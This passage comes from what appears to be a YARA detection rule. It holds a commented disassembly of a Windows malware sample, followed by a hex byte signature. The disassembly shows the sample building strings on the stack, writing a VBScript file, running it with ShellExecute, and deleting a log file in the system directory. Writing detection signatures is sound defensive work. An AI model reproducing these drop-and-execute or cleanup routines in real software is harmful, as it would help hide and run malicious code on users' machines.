885c2452 mov byte [esp + 82],bl + .text:0x00405d6b 88442453 mov byte [esp + 83],al + .text:0x00405d6f 885c2454 mov byte [esp + 84],bl + 
.text:0x00405d73 c644245546 mov byte [esp + 85],70 + .text:0x00405d78 c644245669 mov byte [esp + 86],105 + .text:0x00405d7d c64424576c mov byte [esp + 87],108 + .text:0x00405d82 885c2458 mov byte [esp + 88],bl + .text:0x00405d86 c644245928 mov byte [esp + 89],40 + .text:0x00405d8b c644245a22 mov byte [esp + 90],34 + .text:0x00405d90 c644245b00 mov byte [esp + 91],0 + .text:0x00405d95 c644241c22 mov byte [esp + 28],34 + .text:0x00405d9a c644241d29 mov byte [esp + 29],41 + .text:0x00405d9f c644241e2c mov byte [esp + 30],44 + .text:0x00405da4 c644241f20 mov byte [esp + 31],32 + .text:0x00405da9 c644242054 mov byte [esp + 32],84 + .text:0x00405dae 88542421 mov byte [esp + 33],dl + .text:0x00405db2 c644242275 mov byte [esp + 34],117 + .text:0x00405db7 885c2423 mov byte [esp + 35],bl + .text:0x00405dbb c644242400 mov byte [esp + 36],0 + .text:0x00405dc0 888c24f4000000 mov byte [esp + 244],cl + .text:0x00405dc7 889424f5000000 mov byte [esp + 245],dl + .text:0x00405dce 889c24f6000000 mov byte [esp + 246],bl + .text:0x00405dd5 c68424f700000061 mov byte [esp + 247],97 + .text:0x00405ddd 888424f8000000 mov byte [esp + 248],al + .text:0x00405de4 889c24f9000000 mov byte [esp + 249],bl + .text:0x00405deb c68424fa0000006f mov byte [esp + 250],111 + .text:0x00405df3 c68424fb00000062 mov byte [esp + 251],98 + .text:0x00405dfb c68424fc0000006a mov byte [esp + 252],106 + .text:0x00405e03 889c24fd000000 mov byte [esp + 253],bl + .text:0x00405e0a 888c24fe000000 mov byte [esp + 254],cl + .text:0x00405e11 888424ff000000 mov byte [esp + 255],al + .text:0x00405e18 c684240001000028 mov byte [esp + 256],40 + .text:0x00405e20 c684240101000022 mov byte [esp + 257],34 + .text:0x00405e28 c684240201000073 mov byte [esp + 258],115 + .text:0x00405e30 888c2403010000 mov byte [esp + 259],cl + .text:0x00405e37 88942404010000 mov byte [esp + 260],dl + .text:0x00405e3e c684240501000069 mov byte [esp + 261],105 + .text:0x00405e46 c684240601000070 mov byte [esp + 262],112 + .text:0x00405e4e 88842407010000 
mov byte [esp + 263],al + .text:0x00405e55 c684240801000069 mov byte [esp + 264],105 + .text:0x00405e5d c68424090100006e mov byte [esp + 265],110 + .text:0x00405e65 c684240a01000067 mov byte [esp + 266],103 + .text:0x00405e6d c684240b0100002e mov byte [esp + 267],46 + .text:0x00405e75 c684240c01000066 mov byte [esp + 268],102 + .text:0x00405e7d c684240d01000069 mov byte [esp + 269],105 + .text:0x00405e85 c684240e0100006c mov byte [esp + 270],108 + .text:0x00405e8d 889c240f010000 mov byte [esp + 271],bl + .text:0x00405e94 c684241001000073 mov byte [esp + 272],115 + .text:0x00405e9c c684241101000079 mov byte [esp + 273],121 + .text:0x00405ea4 c684241201000073 mov byte [esp + 274],115 + .text:0x00405eac 88842413010000 mov byte [esp + 275],al + .text:0x00405eb3 889c2414010000 mov byte [esp + 276],bl + .text:0x00405eba c68424150100006d mov byte [esp + 277],109 + .text:0x00405ec2 c68424160100006f mov byte [esp + 278],111 + .text:0x00405eca c684241701000062 mov byte [esp + 279],98 + .text:0x00405ed2 c68424180100006a mov byte [esp + 280],106 + .text:0x00405eda 889c2419010000 mov byte [esp + 281],bl + .text:0x00405ee1 888c241a010000 mov byte [esp + 282],cl + .text:0x00405ee8 8884241b010000 mov byte [esp + 283],al + .text:0x00405eef c684241c01000022 mov byte [esp + 284],34 + .text:0x00405ef7 c684241d01000029 mov byte [esp + 285],41 + .text:0x00405eff c684241e0100002e mov byte [esp + 286],46 + .text:0x00405f07 c684241f01000064 mov byte [esp + 287],100 + .text:0x00405f0f 8b3578904000 mov esi,dword [0x00409078] + .text:0x00405f15 6a00 push 0 + .text:0x00405f17 889c2424010000 mov byte [esp + 292],bl + .text:0x00405f1e c68424250100006c mov byte [esp + 293],108 + .text:0x00405f26 889c2426010000 mov byte [esp + 294],bl + .text:0x00405f2d 88842427010000 mov byte [esp + 295],al + .text:0x00405f34 889c2428010000 mov byte [esp + 296],bl + .text:0x00405f3b c684242901000066 mov byte [esp + 297],102 + .text:0x00405f43 c684242a01000069 mov byte [esp + 298],105 + .text:0x00405f4b 
c684242b0100006c mov byte [esp + 299],108 + .text:0x00405f53 889c242c010000 mov byte [esp + 300],bl + .text:0x00405f5a c684242d01000020 mov byte [esp + 301],32 + .text:0x00405f62 c684242e01000077 mov byte [esp + 302],119 + .text:0x00405f6a c684242f01000073 mov byte [esp + 303],115 + .text:0x00405f72 888c2430010000 mov byte [esp + 304],cl + .text:0x00405f79 88942431010000 mov byte [esp + 305],dl + .text:0x00405f80 c684243201000069 mov byte [esp + 306],105 + .text:0x00405f88 c684243301000070 mov byte [esp + 307],112 + .text:0x00405f90 88842434010000 mov byte [esp + 308],al + .text:0x00405f97 c68424350100002e mov byte [esp + 309],46 + .text:0x00405f9f c684243601000073 mov byte [esp + 310],115 + .text:0x00405fa7 888c2437010000 mov byte [esp + 311],cl + .text:0x00405fae 88942438010000 mov byte [esp + 312],dl + .text:0x00405fb5 c684243901000069 mov byte [esp + 313],105 + .text:0x00405fbd c684243a01000070 mov byte [esp + 314],112 + .text:0x00405fc5 8884243b010000 mov byte [esp + 315],al + .text:0x00405fcc c684243c01000066 mov byte [esp + 316],102 + .text:0x00405fd4 c684243d01000075 mov byte [esp + 317],117 + .text:0x00405fdc c684243e0100006c mov byte [esp + 318],108 + .text:0x00405fe4 c684243f0100006c mov byte [esp + 319],108 + .text:0x00405fec c68424400100006e mov byte [esp + 320],110 + .text:0x00405ff4 c684244101000061 mov byte [esp + 321],97 + .text:0x00405ffc c68424420100006d mov byte [esp + 322],109 + .text:0x00406004 889c2443010000 mov byte [esp + 323],bl + .text:0x0040600b c684244401000000 mov byte [esp + 324],0 + .text:0x00406013 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406015 6a00 push 0 + .text:0x00406017 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406019 8d8424ac010000 lea eax,dword [esp + 428] + .text:0x00406020 6804010000 push 260 + .text:0x00406025 50 push eax + .text:0x00406026 6a00 push 0 + .text:0x00406028 ff1538914000 call dword [0x00409138] ;kernel32.GetModuleFileNameA(0,local756,260) + .text:0x0040602e b10a mov cl,10 + .text:0x00406030 b00d mov 
al,13 + .text:0x00406032 6a00 push 0 + .text:0x00406034 c644247825 mov byte [esp + 120],37 + .text:0x00406039 c644247973 mov byte [esp + 121],115 + .text:0x0040603e 884c247a mov byte [esp + 122],cl + .text:0x00406042 8844247b mov byte [esp + 123],al + .text:0x00406046 c644247c25 mov byte [esp + 124],37 + .text:0x0040604b c644247d73 mov byte [esp + 125],115 + .text:0x00406050 884c247e mov byte [esp + 126],cl + .text:0x00406054 8844247f mov byte [esp + 127],al + .text:0x00406058 c684248000000025 mov byte [esp + 128],37 + .text:0x00406060 c684248100000073 mov byte [esp + 129],115 + .text:0x00406068 888c2482000000 mov byte [esp + 130],cl + .text:0x0040606f 88842483000000 mov byte [esp + 131],al + .text:0x00406076 c684248400000025 mov byte [esp + 132],37 + .text:0x0040607e c684248500000073 mov byte [esp + 133],115 + .text:0x00406086 888c2486000000 mov byte [esp + 134],cl + .text:0x0040608d 88842487000000 mov byte [esp + 135],al + .text:0x00406094 c684248800000025 mov byte [esp + 136],37 + .text:0x0040609c c684248900000073 mov byte [esp + 137],115 + .text:0x004060a4 888c248a000000 mov byte [esp + 138],cl + .text:0x004060ab 8884248b000000 mov byte [esp + 139],al + .text:0x004060b2 c684248c00000025 mov byte [esp + 140],37 + .text:0x004060ba c684248d00000073 mov byte [esp + 141],115 + .text:0x004060c2 c684248e00000025 mov byte [esp + 142],37 + .text:0x004060ca c684248f00000073 mov byte [esp + 143],115 + .text:0x004060d2 c684249000000025 mov byte [esp + 144],37 + .text:0x004060da c684249100000073 mov byte [esp + 145],115 + .text:0x004060e2 888c2492000000 mov byte [esp + 146],cl + .text:0x004060e9 88842493000000 mov byte [esp + 147],al + .text:0x004060f0 c684249400000025 mov byte [esp + 148],37 + .text:0x004060f8 c684249500000073 mov byte [esp + 149],115 + .text:0x00406100 c684249600000000 mov byte [esp + 150],0 + .text:0x00406108 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040610a 8d8c24f4000000 lea ecx,dword [esp + 244] + .text:0x00406111 8d54241c lea edx,dword [esp + 28] + 
.text:0x00406115 51 push ecx + .text:0x00406116 8d8424b0010000 lea eax,dword [esp + 432] + .text:0x0040611d 52 push edx + .text:0x0040611e 8d4c2450 lea ecx,dword [esp + 80] + .text:0x00406122 50 push eax + .text:0x00406123 8d542440 lea edx,dword [esp + 64] + .text:0x00406127 51 push ecx + .text:0x00406128 8d8424cc000000 lea eax,dword [esp + 204] + .text:0x0040612f 52 push edx + .text:0x00406130 8d8c24a8000000 lea ecx,dword [esp + 168] + .text:0x00406137 50 push eax + .text:0x00406138 8d542474 lea edx,dword [esp + 116] + .text:0x0040613c 51 push ecx + .text:0x0040613d 8d442430 lea eax,dword [esp + 48] + .text:0x00406141 52 push edx + .text:0x00406142 8d8c2494000000 lea ecx,dword [esp + 148] + .text:0x00406149 50 push eax + .text:0x0040614a 8d9424d0020000 lea edx,dword [esp + 720] + .text:0x00406151 51 push ecx + .text:0x00406152 52 push edx + .text:0x00406153 e8681d0000 call 0x00407ec0 ;msvcrt.sprintf(local500,local1068) + .text:0x00406158 83c42c add esp,44 + .text:0x0040615b 6a00 push 0 + .text:0x0040615d ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040615f 6810270000 push 0x00002710 + .text:0x00406164 e8b70b0000 call 0x00406d20 ;sub_00406d20(0x00002710) + .text:0x00406169 83c404 add esp,4 + .text:0x0040616c 8bf8 mov edi,eax + .text:0x0040616e c68424af01000000 mov byte [esp + 431],0 + .text:0x00406176 c644242825 mov byte [esp + 40],37 + .text:0x0040617b 6a00 push 0 + .text:0x0040617d c644242d73 mov byte [esp + 45],115 + .text:0x00406182 c644242e25 mov byte [esp + 46],37 + .text:0x00406187 c644242f64 mov byte [esp + 47],100 + .text:0x0040618c c64424302e mov byte [esp + 48],46 + .text:0x00406191 c644243176 mov byte [esp + 49],118 + .text:0x00406196 c644243262 mov byte [esp + 50],98 + .text:0x0040619b c644243373 mov byte [esp + 51],115 + .text:0x004061a0 c644243400 mov byte [esp + 52],0 + .text:0x004061a5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004061a7 8d8424ac010000 lea eax,dword [esp + 428] + .text:0x004061ae 57 push edi + .text:0x004061af 8d4c242c lea ecx,dword 
[esp + 44] + .text:0x004061b3 50 push eax + .text:0x004061b4 8d942450010000 lea edx,dword [esp + 336] + .text:0x004061bb 51 push ecx + .text:0x004061bc 52 push edx + .text:0x004061bd e8fe1c0000 call 0x00407ec0 ;msvcrt.sprintf(local856,local1144) + .text:0x004061c2 83c410 add esp,16 + .text:0x004061c5 6a00 push 0 + .text:0x004061c7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004061c9 6a00 push 0 + .text:0x004061cb 6a00 push 0 + .text:0x004061cd 6a02 push 2 + .text:0x004061cf 6a00 push 0 + .text:0x004061d1 6a00 push 0 + .text:0x004061d3 8d84245c010000 lea eax,dword [esp + 348] + .text:0x004061da 6800000040 push 0x40000000 + .text:0x004061df 50 push eax + .text:0x004061e0 ff15ac904000 call dword [0x004090ac] ;kernel32.CreateFileA(local856,0x40000000,0,0,2,0,0) + .text:0x004061e6 6a00 push 0 + .text:0x004061e8 8bf8 mov edi,eax + .text:0x004061ea ffd6 call esi ;kernel32.Sleep(0) + .text:0x004061ec 8d8c2444010000 lea ecx,dword [esp + 324] + .text:0x004061f3 6a00 push 0 + .text:0x004061f5 51 push ecx + .text:0x004061f6 8d9424b4020000 lea edx,dword [esp + 692] + .text:0x004061fd 68f4010000 push 500 + .text:0x00406202 52 push edx + .text:0x00406203 57 push edi + .text:0x00406204 ff15a4904000 call dword [0x004090a4] ;kernel32.WriteFile(kernel32.CreateFileA(local856,0x40000000,0,0,2,0,0),local500,500,local860,0) + .text:0x0040620a 6a00 push 0 + .text:0x0040620c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040620e 57 push edi + .text:0x0040620f ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(<0x004061e0>) + .text:0x00406215 6a00 push 0 + .text:0x00406217 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406219 6a00 push 0 + .text:0x0040621b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040621d c644240c6f mov byte [esp + 12],111 + .text:0x00406222 c644240d70 mov byte [esp + 13],112 + .text:0x00406227 885c240e mov byte [esp + 14],bl + .text:0x0040622b 6a00 push 0 + .text:0x0040622d c64424136e mov byte [esp + 19],110 + .text:0x00406232 c644241400 mov byte [esp + 20],0 + 
.text:0x00406237 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406239 6a00 push 0 + .text:0x0040623b 6a00 push 0 + .text:0x0040623d 8d842450010000 lea eax,dword [esp + 336] + .text:0x00406244 6a00 push 0 + .text:0x00406246 8d4c2418 lea ecx,dword [esp + 24] + .text:0x0040624a 50 push eax + .text:0x0040624b 51 push ecx + .text:0x0040624c 6a00 push 0 + .text:0x0040624e ff15ac914000 call dword [0x004091ac] ;shell32.ShellExecuteA(0,local1172,local856,0,0,0) + .text:0x00406254 6a00 push 0 + .text:0x00406256 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406258 6a00 push 0 + .text:0x0040625a ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040625c 6a00 push 0 + .text:0x0040625e ff1510914000 call dword [0x00409110] ;kernel32.ExitProcess(0) + .text:0x00406264 5f pop edi + .text:0x00406265 5e pop esi + .text:0x00406266 5b pop ebx + .text:0x00406267 90 nop + .text:0x00406268 90 nop + .text:0x00406269 90 nop + .text:0x0040626a 90 nop + .text:0x0040626b 90 nop + .text:0x0040626c 90 nop + .text:0x0040626d 90 nop + .text:0x0040626e 90 nop + .text:0x0040626f 90 nop + .text:0x00406270 + .text:0x00406270 FUNC: int cdecl sub_00406270( ) [2 XREFS] + .text:0x00406270 + .text:0x00406270 Stack Variables: (offset from initial top of stack) + .text:0x00406270 -260: int local260 + .text:0x00406270 -261: int local261 + .text:0x00406270 -262: int local262 + .text:0x00406270 -263: int local263 + .text:0x00406270 -264: int local264 + .text:0x00406270 -265: int local265 + .text:0x00406270 -266: int local266 + .text:0x00406270 -267: int local267 + .text:0x00406270 -268: int local268 + .text:0x00406270 -269: int local269 + .text:0x00406270 -270: int local270 + .text:0x00406270 -271: int local271 + .text:0x00406270 -272: int local272 + .text:0x00406270 -273: int local273 + .text:0x00406270 -274: int local274 + .text:0x00406270 -275: int local275 + .text:0x00406270 -276: int local276 + .text:0x00406270 -277: int local277 + .text:0x00406270 -278: int local278 + .text:0x00406270 -279: int local279 + 
.text:0x00406270 -280: int local280 + .text:0x00406270 -284: int local284 + .text:0x00406270 -285: int local285 + .text:0x00406270 -286: int local286 + .text:0x00406270 -287: int local287 + .text:0x00406270 -288: int local288 + .text:0x00406270 -289: int local289 + .text:0x00406270 -290: int local290 + .text:0x00406270 -291: int local291 + .text:0x00406270 -292: int local292 + .text:0x00406270 -293: int local293 + .text:0x00406270 -294: int local294 + .text:0x00406270 -295: int local295 + .text:0x00406270 -296: int local296 + .text:0x00406270 -297: int local297 + .text:0x00406270 -298: int local298 + .text:0x00406270 -299: int local299 + .text:0x00406270 -300: int local300 + .text:0x00406270 -301: int local301 + .text:0x00406270 -302: int local302 + .text:0x00406270 -303: int local303 + .text:0x00406270 -304: int local304 + .text:0x00406270 -305: int local305 + .text:0x00406270 -306: int local306 + .text:0x00406270 -307: int local307 + .text:0x00406270 -308: int local308 + .text:0x00406270 + .text:0x00406270 81ec34010000 sub esp,308 + .text:0x00406276 b045 mov al,69 + .text:0x00406278 53 push ebx + .text:0x00406279 56 push esi + .text:0x0040627a 8b3578904000 mov esi,dword [0x00409078] + .text:0x00406280 88442415 mov byte [esp + 21],al + .text:0x00406284 88442418 mov byte [esp + 24],al + .text:0x00406288 57 push edi + .text:0x00406289 b065 mov al,101 + .text:0x0040628b b374 mov bl,116 + .text:0x0040628d b179 mov cl,121 + .text:0x0040628f 6a00 push 0 + .text:0x00406291 c644241c4b mov byte [esp + 28],75 + .text:0x00406296 c644241e52 mov byte [esp + 30],82 + .text:0x0040629b c644241f4e mov byte [esp + 31],78 + .text:0x004062a0 c64424214c mov byte [esp + 33],76 + .text:0x004062a5 c644242233 mov byte [esp + 34],51 + .text:0x004062aa c644242332 mov byte [esp + 35],50 + .text:0x004062af c64424242e mov byte [esp + 36],46 + .text:0x004062b4 c644242564 mov byte [esp + 37],100 + .text:0x004062b9 c64424266c mov byte [esp + 38],108 + .text:0x004062be c64424276c mov byte [esp + 
39],108 + .text:0x004062c3 c644242800 mov byte [esp + 40],0 + .text:0x004062c8 c644242c47 mov byte [esp + 44],71 + .text:0x004062cd 8844242d mov byte [esp + 45],al + .text:0x004062d1 885c242e mov byte [esp + 46],bl + .text:0x004062d5 c644242f53 mov byte [esp + 47],83 + .text:0x004062da 884c2430 mov byte [esp + 48],cl + .text:0x004062de c644243173 mov byte [esp + 49],115 + .text:0x004062e3 885c2432 mov byte [esp + 50],bl + .text:0x004062e7 88442433 mov byte [esp + 51],al + .text:0x004062eb c64424346d mov byte [esp + 52],109 + .text:0x004062f0 c644243544 mov byte [esp + 53],68 + .text:0x004062f5 c644243669 mov byte [esp + 54],105 + .text:0x004062fa c644243772 mov byte [esp + 55],114 + .text:0x004062ff 88442438 mov byte [esp + 56],al + .text:0x00406303 c644243963 mov byte [esp + 57],99 + .text:0x00406308 885c243a mov byte [esp + 58],bl + .text:0x0040630c c644243b6f mov byte [esp + 59],111 + .text:0x00406311 c644243c72 mov byte [esp + 60],114 + .text:0x00406316 884c243d mov byte [esp + 61],cl + .text:0x0040631a c644243e41 mov byte [esp + 62],65 + .text:0x0040631f c644243f00 mov byte [esp + 63],0 + .text:0x00406324 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406326 8d442428 lea eax,dword [esp + 40] + .text:0x0040632a 8d4c2418 lea ecx,dword [esp + 24] + .text:0x0040632e 50 push eax + .text:0x0040632f 51 push ecx + .text:0x00406330 ff15ec904000 call dword [0x004090ec] ;kernel32.LoadLibraryA(local1472) + .text:0x00406336 50 push eax + .text:0x00406337 ff15e8904000 call dword [0x004090e8] ;kernel32.GetProcAddress(kernel32,local1456) + .text:0x0040633d 6a00 push 0 + .text:0x0040633f 8bf8 mov edi,eax + .text:0x00406341 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406343 8d54243c lea edx,dword [esp + 60] + .text:0x00406347 6804010000 push 260 + .text:0x0040634c 52 push edx + .text:0x0040634d ffd7 call edi ;kernel32.GetSystemDirectoryA(local1436,260) + .text:0x0040634f 6a00 push 0 + .text:0x00406351 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406353 6a00 push 0 + 
.text:0x00406355 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406357 6a00 push 0 + .text:0x00406359 c64424105c mov byte [esp + 16],92 + .text:0x0040635e c64424116f mov byte [esp + 17],111 + .text:0x00406363 c644241275 mov byte [esp + 18],117 + .text:0x00406368 c644241372 mov byte [esp + 19],114 + .text:0x0040636d c64424146c mov byte [esp + 20],108 + .text:0x00406372 c64424156f mov byte [esp + 21],111 + .text:0x00406377 c644241667 mov byte [esp + 22],103 + .text:0x0040637c c64424172e mov byte [esp + 23],46 + .text:0x00406381 c644241864 mov byte [esp + 24],100 + .text:0x00406386 c644241961 mov byte [esp + 25],97 + .text:0x0040638b 885c241a mov byte [esp + 26],bl + .text:0x0040638f c644241b00 mov byte [esp + 27],0 + .text:0x00406394 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406396 8d44240c lea eax,dword [esp + 12] + .text:0x0040639a 8d4c243c lea ecx,dword [esp + 60] + .text:0x0040639e 50 push eax + .text:0x0040639f 51 push ecx + .text:0x004063a0 ff15cc904000 call dword [0x004090cc] ;kernel32.lstrcatA(local1436,local1484) + .text:0x004063a6 6a00 push 0 + .text:0x004063a8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063aa 6a00 push 0 + .text:0x004063ac ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063ae 8d54243c lea edx,dword [esp + 60] + .text:0x004063b2 52 push edx + .text:0x004063b3 ff1518914000 call dword [0x00409118] ;kernel32.DeleteFileA(local1436) + .text:0x004063b9 6a00 push 0 + .text:0x004063bb ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063bd e85ef5ffff call 0x00405920 ;sub_00405920() + .text:0x004063c2 5f pop edi + .text:0x004063c3 5e pop esi + .text:0x004063c4 5b pop ebx + .text:0x004063c5 81c434010000 add esp,308 + .text:0x004063cb c3 ret + */ + $c6 = { 81 EC 94 04 00 00 53 56 57 B9 18 00 00 00 33 C0 8D BC 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 00 C6 84 24 ?? ?? ?? ?? 00 F3 AB 66 AB AA B9 7C 00 00 00 33 C0 8D BC 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 00 F3 AB 66 AB AA B9 3F 00 00 00 33 C0 8D BC 24 ?? ?? ?? ?? 
B2 72 F3 AB 66 AB AA B3 65 B0 74 B1 63 C6 44 24 ?? 64 C6 44 24 ?? 69 C6 44 24 ?? 6D C6 44 24 ?? 20 C6 44 24 ?? 77 C6 44 24 ?? 73 C6 44 24 ?? 68 C6 44 24 ?? 00 C6 44 24 ?? 4F C6 44 24 ?? 6E C6 44 24 ?? 20 C6 44 24 ?? 45 88 54 24 ?? 88 54 24 ?? C6 44 24 ?? 6F 88 54 24 ?? C6 44 24 ?? 20 C6 44 24 ?? 52 88 5C 24 ?? C6 44 24 ?? 73 C6 44 24 ?? 75 C6 44 24 ?? 6D 88 5C 24 ?? C6 44 24 ?? 20 C6 44 24 ?? 4E 88 5C 24 ?? C6 44 24 ?? 78 88 44 24 ?? C6 44 24 ?? 00 C6 84 24 ?? ?? ?? ?? 73 88 9C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 20 C6 84 24 ?? ?? ?? ?? 77 C6 84 24 ?? ?? ?? ?? 73 C6 84 24 ?? ?? ?? ?? 68 C6 84 24 ?? ?? ?? ?? 3D 88 8C 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 61 88 84 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 4F C6 84 24 ?? ?? ?? ?? 62 C6 84 24 ?? ?? ?? ?? 6A 88 9C 24 ?? ?? ?? ?? 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 28 C6 84 24 ?? ?? ?? ?? 22 C6 84 24 ?? ?? ?? ?? 57 C6 84 24 ?? ?? ?? ?? 53 88 8C 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 70 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 2E C6 84 24 ?? ?? ?? ?? 53 C6 84 24 ?? ?? ?? ?? 68 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 6C C6 84 24 ?? ?? ?? ?? 6C C6 84 24 ?? ?? ?? ?? 22 C6 84 24 ?? ?? ?? ?? 29 C6 84 24 ?? ?? ?? ?? 00 C6 84 24 ?? ?? ?? ?? 53 88 9C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 20 C6 84 24 ?? ?? ?? ?? 6F C6 84 24 ?? ?? ?? ?? 62 C6 84 24 ?? ?? ?? ?? 6A C6 84 24 ?? ?? ?? ?? 46 C6 84 24 ?? ?? ?? ?? 53 C6 84 24 ?? ?? ?? ?? 4F C6 84 24 ?? ?? ?? ?? 20 C6 84 24 ?? ?? ?? ?? 3D C6 84 24 ?? ?? ?? ?? 20 C6 84 24 ?? ?? ?? ?? 43 88 94 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 61 88 84 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 4F C6 84 24 ?? ?? ?? ?? 62 C6 84 24 ?? ?? ?? ?? 6A 88 9C 24 ?? ?? ?? ?? 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 28 C6 84 24 ?? ?? ?? ?? 22 C6 84 24 ?? ?? ?? ?? 53 88 8C 24 ?? ?? ?? ?? 
88 94 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 70 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 6E C6 84 24 ?? ?? ?? ?? 67 C6 84 24 ?? ?? ?? ?? 2E C6 84 24 ?? ?? ?? ?? 46 C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 6C 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 53 C6 84 24 ?? ?? ?? ?? 79 C6 84 24 ?? ?? ?? ?? 73 88 84 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 6D C6 84 24 ?? ?? ?? ?? 4F C6 84 24 ?? ?? ?? ?? 62 C6 84 24 ?? ?? ?? ?? 6A 88 9C 24 ?? ?? ?? ?? 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 22 C6 84 24 ?? ?? ?? ?? 29 C6 84 24 ?? ?? ?? ?? 00 C6 44 24 ?? 77 C6 44 24 ?? 73 88 4C 24 ?? 88 54 24 ?? C6 44 24 ?? 69 C6 44 24 ?? 70 88 44 24 ?? C6 44 24 ?? 2E C6 44 24 ?? 73 C6 44 24 ?? 6C 88 5C 24 ?? 88 5C 24 ?? C6 44 24 ?? 70 C6 44 24 ?? 20 C6 44 24 ?? 31 C6 44 24 ?? 30 C6 44 24 ?? 30 C6 44 24 ?? 30 C6 44 24 ?? 00 C6 44 24 ?? 6F C6 44 24 ?? 62 C6 44 24 ?? 6A C6 44 24 ?? 46 C6 44 24 ?? 53 C6 44 24 ?? 4F C6 44 24 ?? 2E C6 44 24 ?? 44 88 5C 24 ?? C6 44 24 ?? 6C 88 5C 24 ?? 88 44 24 ?? 88 5C 24 ?? C6 44 24 ?? 46 C6 44 24 ?? 69 C6 44 24 ?? 6C 88 5C 24 ?? C6 44 24 ?? 28 C6 44 24 ?? 22 C6 44 24 ?? 00 C6 44 24 ?? 22 C6 44 24 ?? 29 C6 44 24 ?? 2C C6 44 24 ?? 20 C6 44 24 ?? 54 88 54 24 ?? C6 44 24 ?? 75 88 5C 24 ?? C6 44 24 ?? 00 88 8C 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 61 88 84 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 6F C6 84 24 ?? ?? ?? ?? 62 C6 84 24 ?? ?? ?? ?? 6A 88 9C 24 ?? ?? ?? ?? 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 28 C6 84 24 ?? ?? ?? ?? 22 C6 84 24 ?? ?? ?? ?? 73 88 8C 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 70 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 6E C6 84 24 ?? ?? ?? ?? 67 C6 84 24 ?? ?? ?? ?? 2E C6 84 24 ?? ?? ?? ?? 66 C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 6C 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 73 C6 84 24 ?? ?? ?? ?? 
